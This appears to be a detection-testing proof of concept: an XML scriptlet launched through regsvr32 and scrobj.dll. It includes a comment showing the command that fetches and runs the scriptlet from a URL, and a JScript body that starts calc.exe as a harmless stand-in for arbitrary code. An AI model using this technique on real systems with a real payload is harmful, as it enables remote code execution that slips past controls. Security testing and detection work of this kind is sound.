23 lines
965 B
Plaintext
23 lines
965 B
Plaintext
<?XML version="1.0"?>
|
|
<scriptlet>
|
|
<registration
|
|
progid="PoC"
|
|
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
|
|
<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll -->
|
|
|
|
<!-- .sct files when downloaded, are executed from a path like this -->
|
|
<!-- Please Note, file extenstion does not matter -->
|
|
<!-- Though, the name and extension are arbitary.. -->
|
|
<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
|
|
<!-- Based on current research, no registry keys are written, since call "uninstall" -->
|
|
<!-- You can either execute locally, or from a url -->
|
|
<script language="JScript">
|
|
<![CDATA[
|
|
// calc.exe should launch, this could be any arbitrary code.
|
|
// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
|
|
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
|
|
|
]]>
|
|
</script>
|
|
</registration>
|
|
</scriptlet> |